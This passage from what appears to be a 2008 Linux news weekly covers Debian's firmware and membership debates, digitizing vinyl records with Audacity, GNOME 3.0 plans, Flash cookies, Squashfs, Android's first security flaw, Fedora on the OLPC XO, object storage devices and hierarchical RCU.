which is not the kernel expected to be shipped with the Lenny release.  For
the 2.6.26 kernel used by Lenny, Ben Hutchings reports that he has done the necessary work to
excise the remaining firmware.


On the other side, there are developers who are more concerned about
(1) getting the Lenny release out as quickly as possible, and
(2) making sure that hardware Just Works for Lenny users.  They would
rather that the process of removing firmware continue independently of (and
without delaying) the
Lenny release.


This is Debian that we're talking about, so the issue will probably be
decided by way of a general resolution.  There are currently two sets of
resolutions being circulated, though neither has reached a final state for
voting.  The first set addresses the Lenny
question, providing two options: either delay Lenny until the firmware
removal work is complete, or accept that - just once more, really this
time, honest - a major Debian release will include some firmware in its
kernel.  (The "ship Lenny" option is actually two options, one allowing
firmware and one allowing Debian Free Software Guidelines violations in
general).  What the project will decide once this resolution comes to a
vote is unclear - but Debian's developers have always voted to get the
release out in the past.


The second proposal addresses what happens
after the Lenny release; it says that any package which violates the Debian
Free Software Guidelines for more than 180 days will be forced into
the non-free repository.  The clear hope here is to ensure that this tiresome
discussion doesn't happen yet again in the next release cycle.  By the time
the next release is getting close to ready, any non-compliant packages will
have long since been banished to the non-free wasteland.  If it ever comes
down to moving the kernel to non-free, though, one can assume that the
discussion will resume with a vengeance.

Developers, Members, Maintainers, and Contributors

Meanwhile, a different disagreement is headed toward - you guessed it - a
general resolution.  Long-time Debian watchers have noted that another
recurring topic of debate is the acceptance of new developers.  The new
maintainer process involves long delays, tests of ideological purity, and
more.  Even when it works smoothly (which seems to generally be the case in
recent years) it requires a certain amount of patience and determination on
the part of an aspiring Debian Developer.

The difficulty of the process is a design feature; Debian developers occupy
a position of some trust, and the project wants to make sure that
applicants are serious.  Over time, though, it has become clear that this
process is costing the project the time and energy of talented contributors
who do not wish to jump through all the hoops.  In response, the project
created a "Debian maintainer" designation which allows the uploading of
packages, but withholds many of the other privileges enjoyed by full
developers.  This change appears to have been successful in enabling a
larger group of developers to contribute to Debian.

More recently, Joerg Jaspert has proposed
lowering the bar to certain types of contribution even further.  The
proposal reads:


	Debian is about developing a free operating system, but there's
	more in an operating system than just software and packages.  If we
	want translators, documentation writers, artists, free software
	advocates, et al. to get endorsed by the project and feel proud for
	it, we need some way to acknowledge that.


To that end, Joerg would create a new "Debian Contributor" classification.
Contributors would be those doing translations or documentation; the
proposal doesn't say that contributors don't touch code, but one gets that
sense.  Contributors would still have to jump through some hoops, but they
would be fewer.  They would not be able to upload packages on their own.
The proposal also changes the Debian Maintainer standards, making that
designation a little bit harder to get.  Finally, the proposal states that 
all new applicants to the project would become Contributors or
Maintainers.  Only after a six-month period would they be able to apply for
full Debian Developer or Debian Member status -- "Debian Member" being
another new category that, while being equivalent to Debian Developer in
almost all respects, would not have package upload privileges.

Interestingly, there has not been much discussion of the substance of this
proposal.  But there has been a fair amount of debate over how it is being
done.  It would appear that some developers see this change as being
imposed by a single project official without the debate that Debian changes
normally require.  Martin Krafft has further asserted that this kind of change goes beyond
Joerg's authority as Debian account manager, a claim that Joerg
denies. 

So now there are proposed general resolutions being circulated.  An early version simply decreed that the
proposed changes were "suspended" in favor of changes to be made through a
more consensus-oriented process.  Later
versions soften the language somewhat, and thank Joerg for his effort
in this area - but still require a "consensus or general resolution" before
changes are adopted.  In any form, the clear point of the resolution is to
slow down the process and open it up for a wider discussion.


Again, voting has not begun on any specific resolution, so we don't yet
know what will even be voted on, much less how it will come out.  But we
can expect that, as a certain presidential election process finally
(thankfully) comes to a close, activity will be picking up on a different
set of votes.

		Digitizing Vinyl Records with Audacity


The Audacity
sound editor is an excellent application with many uses.
Your author recently started working on a long-term project to
convert the better parts of his ancient vinyl phonograph record
collection to FLAC
files so that they could be added to his digital audio library.
Audacity was chosen to do the audio recording and processing work.


Prior to undertaking such a project, one must first assemble
the appropriate equipment.
An older desktop computer with an Athlon 2500 processor and
500MB of RAM was used for the computing platform.
Besides a sufficiently powerful CPU, the second most important
piece of hardware is a decent sound card.  An

M-AUDIO Delta 44 was chosen.
Standard sound cards should also work, but the Delta 44 has
higher quality A-D converters that are mounted external to the
computer for lower noise.
The Ubuntu Studio distribution
was used on the machine, although any current Linux distribution should work.


The turntable is an ancient Technics SL-D3 and a Pioneer SX-780 receiver
is used as the phono preamp.  One of the Tape Record Outputs
from the Pioneer receiver is fed into the Delta 44 sound card with
an appropriate set of adapter cables.  The turntable's tracking
weight, anti-skid settings and platter speed should all be adjusted
appropriately.
One of the new USB turntables could probably be used here if you don't
already have access to the legacy hardware.


The Audacity sound editor needs to be set up by entering the
Edit-&gt;Preferences
menu, the audio quality was set to 44,100 Hz sampling at 16 bits
(standard CD quality).  Depending on your needs, other sample rates
can be used.  One of the more important configuration steps
involves making sure the Software Playthrough button in the
Audio I/O
preference window is deselected.  On this particular machine, enabling
Software Playthrough
results in audible sample loss on the recording.
Audio monitoring is done through the Pioneer receiver.
The audio meter should be enabled on the main
Audacity window and the GNOME ALSA sound mixer is used to set the
sound card input levels.  The machine is now ready to record.


It is a good idea to make a few test recordings on various album
tracks to set the sound card's input level adjustment.
A loud track should be played and the input level should be adjusted
to achieve fairly high readings on the meter without any clipping.


Unless you only need to extract one track, it is best to record an
entire album side in one pass.  Recording should be enabled prior to
setting the needle on the record, and disabled after the needle
has been lifted.  Be sure to use an appropriate record cleaner
on the disc to get rid of any dust particles.


When an album side has been successfully recorded and the levels look
reasonable, it is time to do some trimming.
Listen to the beginning of the recording with the volume up a bit,
At some point the sound will probably begin with a fade in.
Select the audio
from the beginning of the recording, past the initial pop from the
needle landing in the groove, and ending a few seconds before the
first track starts.
Delete the selection with Edit-&gt;Delete.
Next, select from the new beginning to where the sound begins.
Use Effect-&gt;Fade In to make a smooth
transition from quiet to the beginning of the audio.
Perform a similar edit at the end of the album side.
Delete everything from a few seconds beyond the last sound to the end
of the recording and put a Fade Out at the end of the side.


If your album has a few clicks and pops, now is the time to remove
them.  Select the entire recording with Edit-&gt;Select-&gt;All
and de-click with Effect-&gt;Click Removal.  The default click
filter settings seem to work fairly well.


The next step involves putting labels at the beginning of each song,
assuming the album's material is not one long track.  First, create
a label track with Tracks-&gt;Add New-&gt;Label Track.
Hit the &lt;&lt; rewind button and type Control-B, this puts a label
at the beginning of the recording.  Move through the album side and
put more labels at the middle of each song transition.  It is a good
idea to zoom in and put the label on a wave zero-crossing point to prevent
clicks at the beginnings of individual tracks.
If you zoom in, you can often see a change in wave patterns that is left
over from the master tape splice.
The recording should now look something like the first frame of the
Audacity Images.


It is a good idea to listen carefully to the entire recorded album side.
If the recording has any obnoxiously loud clicks and pops that weren't
removed with the Click Removal step, Audacity can smooth them out.
To smooth out a click, locate the offending waveform
by playing and pausing, then zoom in multiple times until the click is
visible.  Select a small region around the click (Effect-&gt;Repair to smooth out the waveform.
Zoom out and play the area where the click removal was performed to
verify the operation.  Audacity is very forgiving, if you don't like the results of
the click removal or make another type of mistake,
Edit-&gt;Undo will reverse most operations.
An example Repair operation is shown in the
Audacity Images.


At this point, it is time to split the album side into individual
audio files.  Select File-&gt;Export Multiple, chose the
desired export format such as WAV, select
Split files: based on labels
and Name files: Numbering consecutively.
Click the Export button and click Audacity will render
the individual track files.
Audacity can create .mp3 and .flac files at this point, or that can
be done at a later time.
At this point, you exit Audacity and save any edit information if
you think you will need to work on the recording later.


The same operations are performed on the B-side of the record.
Your author likes to use a short BASH script to rename the
Audacity-generated file names to his own name scheme.
The track files are all grouped together in one directory,
converted to FLAC format with the command FLAC *.wav.
A meta-data text file is created with digitizing notes,
track titles and any other information that you wish to save.
Lastly, all of the files are played one more time to verify that
there are no problems.  The original album side tracks can now
be safely deleted to reclaim some disk space.


With enough editing effort, it is possible to make a digital copy
of a vinyl record that sounds better than the original.
Performing all of the above steps on a large collection of albums
is a big undertaking, but the reward comes in turning a hard to play
discrete music library into an easy to play digital library.


For furthur information on this topic, see the
followup article.


		Directions for GNOME 3.0


Earlier this year at the Gnome Users and Developers Conference, it was
announced that there would be a Gnome 3.0 and discussions about how to
make the transition are now open. Since then, there has been another
gathering
of Gnome developers, discussing and making plans about how they would
like to modernize the interface. Over the past few days, a number of
blog posts have appeared on Planet Gnome discussing some of the
happenings at this five day event, and I felt a summary of the ideas
so far might be useful to everyone concerned.

The Journal


The idea that has perhaps received the clearest exposition, along with some
concrete work on beginning to make it a reality, is a refreshed way to
handle day to day file management based on the OLPC's journal
concept.  Federico Mena-Quintero posted
to his blog reporting his teams brainstorming session. What's wrong
with how we handle file management today?  Federico says:


    Let's consider a very common workflow: download an image from a
web site, make some modifications to it, and attach it to an e-mail.
When you do "save image as" in your web browser, it will default to
~/Downloads or even ~/Desktop. When you do "file/open" in the GIMP, it
will default to the last directory you used in the GIMP, even if it
was from days ago (on my machine right now, the GIMP defaulted to look
at files from ~/src/some-random-directory) ... The end result is that
your workflow gets shattered to pieces, as programs try to be helpful
within themselves, but they totally fail at being helpful within your
workflow.


    So, programs contribute to having files scattered around
everywhere, and there is no easy way to look at everything together.


To solve this problem, they began from the premise that humans are
fairly good at knowing when they did things: "I started typing my
homework last Monday, because I knew it was due on my Thursday class"
and "I mailed you that photo two weeks ago, right after my birthday


party" were the examples given. From here, the argument is that if we
can present users with a journal view of what they did, they can
forget about where they put a file and just browse through a time line
to find what they were looking for.

The journal would not only keep track of files you created, but
websites you visited, IM conversations you had, and even allow you to
make notes about particular entries. An example of this final kind of
functionality might be noting down reference numbers from receipts or
customer service representatives.The other two major features of the
journal would be the ability to star important items, so they're kept
in a separate section, along with the ability to create files from
directly within the journal, allowing it to act as a kind of scrap
book.

As well as Federico's own proof of concept implementation,
you can also find similar ideas in Mayanna's timeline,
a fork of Gimmie, and the Nemo file
manager.

Task Orientation

This post didn't arise out of the User Experience Hackfest, but from
GUADEC earlier in the year. Karl Lattimer has
posited that the application centric workflow is broken, and that
people don't use a computer with the intention of using a particular
application, but with the intention of completing a particular task.
Obviously tasks rarely stand on their own, but often form part of a
larger project.

Karl comments that he believes Federico is making moves in the right
direction with the journal, providing users with the capacity to track
what they did and when - perhaps a kind of project management
framework - but he believes that we also need to provide users with
the ability to track why things were done, gathering metadata about
the tasks and building a picture of the relationships between them.
The example he uses is that of an email received from a colleague
asking us to update a file by a certain deadline: from this we could
extract the file, the deadline, who sent it to us, and possibly even
what needs doing to the file, all of which could be fed into the
journal or other interface. This obviously has some practical
challenges when it comes to considering how it could be implemented,
but if realized could deliver an automated task list that's closely
linked with templates for commonly performed tasks, doing away with
the idea of static workspaces and applications for ever.

Karl sums up his thoughts nicely in this paragraph:


    For us to get there we need to invent some cool stuff, semantics
is one part, organising the data by what it is rather than where it
is, especially when the user has a tendency to loose things in the
jungle of file systems. Journals and revision control are another part
of it, remembering what we've been doing and when, but also templates
and schema's are part of it too, hiding the notion of an application
behind the tasks you want to achieve and the things you want to get
done.


The Desktop Shell

During this hackfest session, the team tried to forget about the
current Gnome interface and focus on what makes sense for users;
ironically, Vincent
Untz decided to start his
post, about how the team forgot about 
the current Gnome interface, with some observations of the current
Gnome interface. The problems he identified in the current interface
were four-fold. Firstly, finding the window you want can be difficult
when using the default applet, particularly if you have more than a
few windows open, and particularly if you have a smaller screen.
Secondly, few people make use of the multiple workspaces idea, largely
because they were just unaware of their existence. Thirdly,
application menus are a slow and inefficient way to open up new
applications; some take advantage of launchers or the run dialog to
improve on this, but most don't know how to do this. And finally, the
current panel is certainly very powerful, but its power is wasted in
unneeded flexibility such as being able to position the panel in the
middle of the screen.

Perhaps the most controversial proposal to fix these problems so far
is to restrict Gnome to a single static panel: by removing one panel
we'd be saving valuable screen real estate, and by having a layout we
can depend on we'd be able to use "hot corners" more effectively,
allowing users to easily set their presence, as well as to launch a
new "activities overlay mode". While the idea of a single panel hasn't
raised too much concern, the static point has: Mathias
Hasselmann responds with "Static Panel Nonsense", suggesting that
many Gnome users, himself included, as well as Mac OS and Windows
users, heavily customize the layout of their panels with custom
launchers, and to improve something by removing existing functionality
is not a good approach.

The most promising proposal from my point of view, and what seems to
be a common OLPC inspired train of thought amongst Gnome's community,
is the notion of activities. An activity is essentially what Karl
Lattimer described as a project, made up of individual tasks, and what
many Gnome users organize into separate work spaces in the current
environment. In the current Gnome environment, Vincent argues,
activities and work spaces are static: a user configures 8 desktops
and sticks with them. His proposal is that activities should be far
more flexible, and if a user wants to start a new one then we should
help them by creating a new desktop automatically.

Where Next

Reportedly the release team are busy preparing a plan for how we can
move from Gnome 2.x to 3.0, with the current plan appearing to be that
what would have been called 2.30 will become 3.0. In this time frame,
the very least of what we can expect to see is a revamped Gtk+, but
what changes the user can expect to see is far harder to tell as there
are no known plans for a radical interface overhaul like that seen
during the development of KDE 4. Instead, it appears that the Gnome
release team are planning on sticking to their current principles with
regard to what features will become a core part of the desktop stack:
adoption by popular distributions, stability, and a proven track
record will all be required for features to make it in. This may seem
like it rules out huge amounts of innovation, but there are a number
of existing frameworks in Gnome that are very exciting (PolicyKit,
PackageKit, Clutter, GVFS, desktop search, D-Conf, online desktop),
and perhaps the 3.0 development cycle will see these mature and
finally deliver on their promise of revolutionizing the user
experience, with many of these technologies forming the backbone of
the ideas discussed in this article.

		Another kind of cookie


It has become increasingly difficult to use the web without some kind of
Flash player, but a little-known "feature" of Flash is causing some privacy
concerns.  In some ways, Local Shared
Objects (LSOs aka Flash cookies) are similar to browser cookies, but
there are a number of significant differences as well.
In addition, because the dominant Flash player is closed-source, one must
depend on Adobe's ability to faithfully implement the security model.  In
all, Flash cookies are something that web users should be cognizant of.


At its core, an LSO is a chunk of data that is stored on a user's disk
based on the domain that the Flash program was downloaded from.  Only Flash
programs from that domain should have access to the data and, unlike
browser cookies, much more data can be stored.  By default, 100K bytes can
be used per domain, which is a sizable increase from the 4K available for
browser cookies.  The amount of storage for a Flash cookie can be increased
with the assent of the user, or decreased via the management interface.


Another major difference from the now-familiar browser cookies is that the
interface for managing them is less-than-obvious.  From a given Flash
application, there is a "Settings" menu that allows control of the LSOs
from that site.  To see the sites that have stored Flash cookies or to have
more global control over them, one must visit Adobe's site.
There are also third-party applications and browser add-ons that will allow
more control. A user can also resort to the ultimate control—removing
them from the filesystem (~/.macromedia/Flash_Player/#SharedObjects). 


There are many benign things that a Flash application might do with a bit
of local storage—caching data, storing preferences, etc.—but
they can also be used to track users in much the same way that browser
cookies are used.  Because Flash cookies are less well-known, and harder to
manage, though, they may be more effective because they are removed or
restricted less often.


Another important thing to note is that there is no requirement that there
be a visible Flash application on the web site.  A site could embed a Flash
application with no visible elements simply to store a cookie.  Unless the
user has a browser add-on like NoScript,
they will get no indication that anything has happened.


Assuming that there aren't any holes in Adobe's implementation of the Flash
security model, Flash cookies aren't much different—or more
dangerous—than browser cookies.  But that assumption is a bit
worrisome.  For Firefox or other free software browsers, the code can be
inspected to verify correct behavior.  Either Flash or Firefox could have
some flaw 
that allowed cross-site cookie access (which would be a rather nasty
information disclosure vulnerability), but for Flash, we can only take
Adobe's word.


Privacy advocates have been successful in getting the idea of deleting
browser cookies 
into the consciousness of concerned users, but Flash cookies seem to have
flown below the radar.  A recent blog
posting that was widely reported has helped to raise the profile of
Flash cookies so that users will, hopefully, know that they exist.  Those
with a desire to strictly control their privacy will be better able to do
so. With 
luck, it may also lead Adobe to provide an easier and more visible
interface to manage them 
as well. 


		DebXO for the XO laptop


The XO laptop was developed for the One Laptop Per Child (OLPC)
project.  Two weeks ago the XO Software
Release 8.2.0 was announced.  This week the DebXO project has taken
off, with the goal of providing a Debian-based alternative for the XO
laptop.  Work has been in progress for at least a couple of months, but
versions 0.2 and 0.3 were announced this week.

As of this writing, Andres "dilinger" Salomon  has released three versions, the
debxo-latest symlink points to the latest release.  According to the version 0.2 announcement DebXO has EXT3 images
for booting from USB and/or SD; and while DebXO 0.1 only had a GNOME
desktop, 0.2 includes KDE, LXDE, Sugar, Awesome and GNOME desktops.  Version 0.3 provides some important bug fixes
for problems found in 0.2.

This project is obviously still in its infancy, but it seems like a good
start on an alternative for the XO laptop.  If you have an XO and are
interested in helping out you could start by testing the current versions.
There is a git repository with the code, which has a web
interface, or just use git clone to grab the code.

		Squashfs submitted for the mainline


The Squashfs compressed
filesystem is 
used in everything from Live CDs to embedded devices.  Many or most
distributions ship it in such situations, but squashfs has been
maintained outside of the mainline kernel for years.  That appears to be changing as
it was recently submitted for inclusion in the mainline by Phillip Lougher.  The reaction has
been generally favorable, with Andrew Morton requesting that Lougher move it forward:
"Please prepare a tree for linux-next 
inclusion and unless serious problems are pointed out I'd suggest
shooting for a 2.6.29 merge."
  So it seems like a good time to take a look at some of the
features and capabilities of Squashfs.


The basic idea behind Squashfs is to generate a compressed image of a
filesystem or directory hierarchy that can be mounted as a read-only
filesystem.  This can be done to archive a set of directories or to store
them on a smaller capacity device than would normally be required.  The
latter is used by both Live CDs and embedded devices to squeeze more into
less. 


It has been nearly four years since Squashfs was last submitted to linux-kernel.
Since that time, it has been almost completely rewritten based on
comments from that attempt.  In addition, it has gone through two filesystem
layout revisions in part to allow for 64-bit sizes for files and
filesystems.  Another major change is to make the filesystem little-endian,
so that it can be read on any architecture, regardless of endian-ness.


The mksquashfs utility is used to create the image, which can then
be mounted either via loopback (from a file) or from a regular block device.
One of the features added since the original attempt to mainline
Squashfs—to address complaints made at that time—is the ability
to export a Squashfs filesystem via NFS. 


Squashfs uses gzip compression on filesystem data and metadata, achieving
sizes roughly one-third that of an ext3 filesystem with the same data.  The
performance
is quite good as well, even when compared with the simpler cramfs—a
compressed read-only filesystem already available with the kernel.
According to Lougher, these performance numbers were gathered a number of
years ago, with older versions of the code; newer numbers should be even
better.


Previously, some kernel developers were resistant to adding another
compressed filesystem to the kernel, so Lougher outlines a number of
reasons that Squashfs is superior to cramfs.  Certainly support for larger
files and filesystems is compelling, but the fact that cramfs is orphaned
and unmaintained will likely also play a role.  In addition, Squashfs
supports many more "normal" Linux filesystem features like real inode
numbers, hard links, and exportability.


Morton had a laundry list of overall suggestions for making Squashfs better
in the email referenced above, but documentation is certainly one of the
areas that is somewhat lacking.  In particular, Squashfs maintains its own
cache, which puzzles Morton:

Why not just decompress these blocks into pagecache
  and let the VFS handle the caching??

  The real bug here is that this rather obvious question wasn't
  answered anywhere in the patch submission (afaict). How to fix that?

  Methinks we need a squashfs.txt which covers these things.


One of the reasons that Squashfs doesn't use the page cache is that it
allows for multiple block sizes, from 4K up to 1M, with a default of 128K.
Better compression ratios can be achieved with a larger block size, but that
doesn't work well with the page cache as Jörn Engel 
notes: "One of the problems seems to
be that your blocksize 
can exceed page size and there really isn't any infrastructure to deal
with such cases yet."


Lougher has moved the code into a git
repository, presumably in preparation to get it into linux-next.  He
notes that the CE Linux Forum has
been instrumental in providing funding over the last four months to allow
him to work on getting Squashfs into the mainline.  With the additional
testing that will come from being included in linux-next, it seems quite
possible we could see Squashfs in 2.6.29.


		Android's first vulnerability


A company's response to security vulnerabilities is always interesting to
watch.  Google has the reputation of being fairly cavalier regarding flaws
reported in its code; 
the first security vulnerability reported
for the Android mobile phone software appears to follow that pattern.
Unfortunately for users of Android phones, though, Google's attitude and
relatively slow response might some day lead to an "in the wild" exploit
targeting the phones. 


The flaw was first reported to Google on October 20 by Independent Security
Evaluators (ISE), but was not patched for the G1 phone—the only
shipping Android phone—until November 3.  Details on the
vulnerability are thin, but it affects the web browser and is caused by
Google shipping an out-of-date component.  Presumably a library or content
handler was shipped with a known security flaw that could lead to code
execution as the user id which runs the browser.


It should be noted that compromising the browser does not affect the rest
of the phone due to Android's security architecture.  Unlike the iPhone,
separate applications are run as different users, so that phone
functionality is isolated from the browser, instant messaging, and other
tools.  An iPhone compromise in any application can lead to the attacker
being able to make phone calls and get access to private data associated
with any application; clearly Google made a better choice than Apple.


One interesting recent development, though, is the availability of an
application that provides a root-owned
telnet daemon.  With that running, a simple telnet gets full access to
the phone's filesystem.  From there, jailbreaking—circumventing the
restrictions placed by a carrier on applications—as well as unlocking
the phone from a specific carrier are possible.  While it is easy to see
how that might be useful for the owner of Android, though it opens the
phone to rather intrusive attacks, it probably is not what T-Mobile (and
other carriers down the road) had in mind.


Google's first
response to the vulnerability report was to whine that Charlie
Miller, who discovered the flaw, was not being "responsible" by talking
about it before a fix was ready.  Miller did not disclose details, but did
report the existence of—along with some general information
about—the flaw.  Google's previous reputation regarding vulnerability
reporting, as well as how it treated Miller, undoubtedly played a role in
his decision.


Perhaps the most galling thing is that the flaw was in a free software
component that had been updated prior to the Android release to, at least
in part, close that hole.  It would seem that the Android team was not
paying attention to security flaws reported in the free software components
that make up the phone software stack.  Hopefully, this particular
occurrence will serve as a wake-up call on that front.


Given that the fix was already known, it is a bit puzzling that it
would take two weeks for updates to become available.  It was the first
update made for Android phones in the field, but one hopes the bugs in that
process were worked out long ago.  Overall, Google's response leaves rather
a lot to be desired.


If Google wants security researchers to be more "responsible" in their
disclosure, it would be well served by looking at its own behavior.  Taking
too much time to patch a vulnerability—especially one with a known
and presumably already tested fix—is not the way to show the security
community that it takes such bugs seriously.  Whining about disclosure
rarely, if ever, goes anywhere; working in a partnership with folks who
find security flaws is much more likely to bear fruit.


		Testing Fedora on the OLPC


In preparation for this year's version of the Give One, Get One (G1G1) 
promotion of the One Laptop Per Child (OLPC) XO, the
Fedora OLPC special interest
group (SIG) has
undertaken a rather large testing effort.  With the assistance of 80
mostly-free XOs, the group has been running Fedora 10 on the hardware,
trying to shake out Fedora and OLPC bugs.  The idea is to help lift
some of the burden from the OLPC developers, while also providing some
distribution testing focused on areas specific to the OLPC hardware.


G1G1 participants can optionally purchase an SD card pre-loaded with
a Fedora 10 live distribution, so that they can run a full Fedora desktop on
the XO.  Normally, it runs a stripped-down version of Fedora 9 with the Sugar interface as the only
desktop available.  Part of the Fedora OLPC effort is to help reduce the
operating system burden for the OLPC folks.  Fedora OLPC liaison (and Red
Hat Senior Community Architect) Greg DeKoenigsberg describes where the
project is headed:

The Fedora community is working 
closely with OLPC to incorporate their changes upstream, and we are also 
working to package Sugar as a standard desktop environment for Fedora. 
Our hope is that, in future releases, the XO can run a completely stock 
version of Fedora — that way, OLPC will not have to bear any costs of 
maintaining the distro itself, and can focus their resources where they 
are most effective: the hardware, and Sugar.


Back in September, DeKoenigsberg put out a call for folks interested
in testing, with the incentive of a "mostly" free XO.  Participants
needed to be willing to buy an SD card to put Fedora on and to spend 20
hours testing Fedora on the XO.  There were more volunteers than laptops,
as would be expected, but 80 XOs—most refurbished returns from the
original G1G1 last year—got into the hands of many "experienced
Fedora community members."  The XOs were provided by the OLPC
project through its developer
program. 


The testing has already "found and resolved a number of potential
release blockers," according to DeKoenigsberg.  There is an
extensive test
plan that outlines the different testing areas as well as the
methodology of testing and reporting bugs found.  In many ways, this is
just a test of Fedora on a new hardware platform, with the focus on things
that set the XO apart: power management, networking, the built-in camera,
display, performance, etc.


But there is more to the SIG than just testing the XO.  The task list has a number
of different activities that are currently underway.  Getting a developer
key to each person who chooses the Fedora 10 option in G1G1 is an important
piece 
of the puzzle—the XO security policy will not allow it to boot from
SD without it.  Various Sugar tasks are high on the list as well.


One of those is
the Fedora
Sugar spin, a Live CD that allows running the Sugar environment on
any computer.  So far, there are just a few Sugar "activities"—roughly
equivalent to applications for things like
web browsing or word processing—available for the spin, but that is
another of the 
tasks that Fedora OLPC will be working on.  There is currently a bit of
an awkward debate on the fedora-advisory-board
mailing list about how 
"official" the Sugar spin really is—as it missed the deadline for the
Fedora 
10 freeze—but it would seem that many are in favor of granting it a
waiver.  


The Fedora OLPC SIG's mission statement—To provide the OLPC
project with a strong, sustainable, scalable, community-driven base
platform for innovation—makes it clear it sees a big role in
assisting OLPC going forward.  The testing effort is just one facet of that,
as DeKoenigsberg notes: 

We hope to have success with the Fedora on XO testing project, but the 
real goal is longer term and more strategic.  OLPC has placed a very large 
bet on open source software.  In order to be successful, they need 
knowledgeable contributors — which Fedora has in abundance.  There may be 
more than a million XOs in the wild by the end of this year, and all of 
them will be running a remix of Fedora by default.  In Fedora, we have a 
responsibility to help make OLPC successful, and the Fedora community 
takes that responsibility very seriously.


The OLPC project is one with great promise.  It has suffered at times from
the mixed message that it gives regarding free vs. proprietary software,
but it could, clearly, be a marvelous example of free software in
action.  In order for that to happen, though, there will need to be a
concerted effort by the free software community to assist.  The Fedora OLPC
SIG looks to be an excellent step in that direction.


		Linux and object storage devices


The btrfs filesystem is widely regarded as being the long-term future
choice for Linux.  But what if btrfs is taking the wrong direction,
fighting an old war?  If the nature of our storage devices changes
significantly, our filesystems will have to change as well.  A lot of
attention has been paid to the increasing prevalence of flash-based
devices, but there is another upcoming technology which should be planned
for: object storage devices (OSDs).  The recent posting of a new
filesystem called osdfs
provides a good opportunity to look at OSDs and how they might be supported
under Linux.


The developers of OSDs were driven by the idea that traditional,
block-based disk drives offer an overly low-level interface.  With
contemporary hardware, it should be possible to push more intelligence into
storage devices, offloading work from the host while maintaining (or
improving) performance and security.  So the interface offered by an OSD
does not deal in blocks; instead, the OSD provides "objects" to the host
system.  Most objects will simply be files, but a few other types of
objects (partitions, for example) are supported as well.  The host
manipulates these objects, but need not (and cannot) concern itself with
how those objects are implemented within the device.


A file object is identified by two 64-bit numbers.  It contains whatever
data the creator chooses to put in there; an OSD does not interpret the
data in any way.  Files also have a collection of attributes and metadata;
this includes much of the information stored in an on-disk inode in a
traditional filesystem - but without the block layout information, which
the OSD hides from the rest of the world.  All of the usual operations can
be performed on files - reading, writing, appending, truncating, etc. -
but, again, the implementation of those operations is handled by the OSD.


One thing that is not handled by the OSD, though, is the creation of
a directory hierarchy or the naming of files.  It is expected that the host
filesystem will use file objects to store its directory structure,
providing a suitable interface to the filesystem's users.  One could,
presumably, also use an OSD as a sort of hardware-implemented object
database without a whole lot of high-level code, but that is not where the
focus of work with OSDs is now.


[PULL QUOTE: 
The OSD designers decided to offload
another task from the host systems: security.
 END QUOTE]


The OSD protocol
[PDF] is a T10-sanctioned extension to the SCSI protocol.  It is thus
expected that OSD devices will be directly attached to host systems; the
protocol has been designed to perform well in that mode.  It is also
expected, though, that OSDs will be used in network-attached storage
environments.  For such deployments, the OSD designers decided to offload
another task from the host systems: security.
To that end, the OSD protocol includes an extensive set of security-related
commands.  Every operation on an object must be accompanied by a "capability," a
cryptographically-signed ticket which names the object and the access
rights possessed by the owner of the capability.  In the absence of a
suitable capability, the drive will deny access.

It is expected that capabilities will be handed out by a security policy
daemon running somewhere on the network.  That daemon may be in possession
of the drive's root key, which allows unrestricted access to the drive, or
it may have a separate, partition-level key instead.  Either way, it can
use that key to sign capabilities given out to processes elsewhere in the
system.  (Drives also have a "master" key, used primarily to change the
root key.  Loss of the master key is probably a restore-from-backup sort of
event.)

Capabilities last for a while (they include an expiration time) and
describe all of the allowed operations.  So the act of actually obtaining a
capability should be relatively rare; most OSD operations will be performed
using a capability which the system already has in hand.  That is an
important design feature; adding "ask a daemon for a capability" to the
filesystem I/O path would not be a performance-enhancing move.

In theory, it should be relatively easy to make a standard Linux filesystem
support an OSD.  It's mostly a matter of hacking out much of the low-level
block layout and inode management code, replacing it with the appropriate
object operations.  The osdfs filesystem was created in this way; the
developers started with ext2.  After taking out all the code they no longer
needed, the osdfs developers simply added code translating VFS-level
requests into operations understood by the OSD.  Those requests are then
executed by way of the low-level osd-initiator
code (which was also recently submitted for consideration).
Directories are implemented as simple files containing names and
associated object IDs.  There is no separate on-disk inode; all of that
information is stored as attributes to the file itself.  The end result is
that the osdfs code is relatively small; it is mostly concerned with
remapping VFS operations into OSD operations.


Anybody wanting to test this code may run into one small problem: there are
few OSDs to be found in the neighborhood computer store.  It would appear
that most of the development work so far has been done using OSD
simulators.  The OSC software
OSD is, like osdfs, part of the open-osd project; it implements the OSD
protocol over an SQLite database.  There is also an OSD simulator
hosted at IBM, but it would not appear to be under current development.
Simulator-based development and testing may not be as rewarding as having a
shiny new device implementing OSD in hardware, but it will help to insure
that both the software and the protocol are in good shape by the time such
hardware is available.


It should be noted that the success of OSDs is not entirely assured.  An
OSD takes much of the work normally done in an operating system kernel and
shoves it into a hardware firmware blob where it cannot be inspected or
fixed.  A poor implementation will, at best, not perform well; at worst,
the chances of losing data could increase considerably.  It may yet prove
best to insist that storage devices just concentrate on placing bits where
the operating system tells them to and leave the higher-level decisions to
higher-level code.  Or it may turn out that OSDs are the next step forward
in smarter, more capable hardware.  Either way, it is an interesting
experiment. 


See this
article at Sun for more information on how OSD works.

		Hierarchical RCU


Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU improves scalability
by allowing readers to execute concurrently with writers.
In contrast, conventional locking primitives require that readers
wait for ongoing writers and vice versa.
RCU ensures coherence for read accesses by
maintaining multiple versions of data structures and ensuring that they are not
freed until all pre-existing read-side critical sections complete.
RCU relies on efficient and scalable mechanisms for publishing
and reading new versions of an object, and also for deferring the collection
of old versions.
These mechanisms distribute the work among read and
update paths in such a way as to make read paths extremely fast. In some
cases (non-preemptable kernels), RCU's read-side primitives have zero
overhead.

Although Classic RCU's read-side primitives enjoy excellent
performance and scalability, the update-side primitives which
determine when pre-existing read-side critical sections have
finished, were designed with only a few tens of CPUs in mind.
Their scalability is limited by a global lock that must be
acquired by each CPU at least once during each grace period.
Although Classic RCU actually scales to a couple of hundred CPUs, and
can be tweaked to scale to roughly a thousand CPUs (but at the expense of
extending grace periods), emerging multicore systems will require
it to scale better.

In addition, Classic RCU has a sub-optimal dynticks interface,
with the result that Classic RCU will wake up every CPU at least
once per grace period.
To see the problem with this, consider a 16-CPU system that
is sufficiently lightly loaded that it is keeping only four
CPUs busy.
In a perfect world, the remaining twelve CPUs could be put into
deep sleep mode in order to conserve energy.
Unfortunately, if the four busy CPUs are frequently performing
RCU updates, those twelve idle CPUs will be awakened frequently,
wasting significant energy.
Thus, any major change to Classic RCU should also leave sleeping CPUs lie.

Both the existing and the
proposed implementation
have have Classic RCU semantics and identical APIs, however,
